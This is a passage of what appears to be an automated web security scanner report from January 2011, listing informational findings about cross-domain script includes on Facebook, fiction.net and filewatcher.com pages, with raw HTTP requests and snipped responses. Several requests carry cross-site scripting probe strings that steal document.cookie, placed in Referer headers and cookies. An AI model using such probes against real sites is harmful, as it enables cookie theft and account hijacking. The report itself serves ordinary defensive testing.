Host:   http://www.facebook.com
Path:   /LIMEprpromo

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /LIMEprpromo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Tpmq1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 155797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.780. http://www.facebook.com/abid.bahloul

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /abid.bahloul

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /abid.bahloul HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=6G7wO; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 15128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.781. http://www.facebook.com/apps/application.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /apps/application.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /apps/application.php?id=62945690879 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=-yM75; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:18 GMT
Content-Length: 154403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.782. http://www.facebook.com/beirutcityguide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /beirutcityguide

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /beirutcityguide HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=oJmQq; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 156507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.783. http://www.facebook.com/connect/connect.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /connect/connect.php?%20id=62945690879&connections=10&stream= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 21:11:41 GMT
Content-Length: 11828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.784. http://www.facebook.com/miofeghali

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /miofeghali

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=eDdkX; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:26 GMT
Content-Length: 15117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.785. http://www.facebook.com/paty.kfoury

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /paty.kfoury

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /paty.kfoury HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qOxUt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.786. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 21:55:20 GMT
Content-Length: 10046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.787. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Tue, 25 Jan 2011 02:20:40 GMT
Content-Length: 12910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.788. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.789. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=2yleE; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:04 GMT
Content-Length: 10902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.790. http://www.facebook.com/xd_receiver_v0.4.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /xd_receiver_v0.4.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js

Request

GET /xd_receiver_v0.4.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 445
Content-Type: text/html; charset=utf-8
Expires: Tue, 24 Jan 2012 16:00:31 -0800
Pragma:
Connection: close
Date: Tue, 25 Jan 2011 00:00:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Pa
...[SNIP]...
</script>
<script src="http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js"
type="text/javascript">

</script>
...[SNIP]...

21.791. http://www.fiction.net/blong/programs/#aub/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiction.net
Path:   /blong/programs/#aub/x26amp

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /blong/programs/#aub/x26amp HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14165

<HTML>
<HEAD>
<TITLE>Brandon's Program Archive</TITLE>
</HEAD>
<BODY BGCOLOR=#ffffff>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javas
...[SNIP]...

21.792. http://www.filewatcher.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:27:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:27:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 3081
Content-Length: 5356
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>FileWatcher File Search</title>

...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.793. http://www.filewatcher.com/_/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /_/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /_/ HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jdJ21hfmT/9pG3o+WHhlrA"
Content-Length: 4389
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 810
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>Results</title>
</head>
<body cl
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.794. http://www.filewatcher.com/b/ftp/15.192.45.22.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SQiChgZEV13FKmoJDq2wlA"
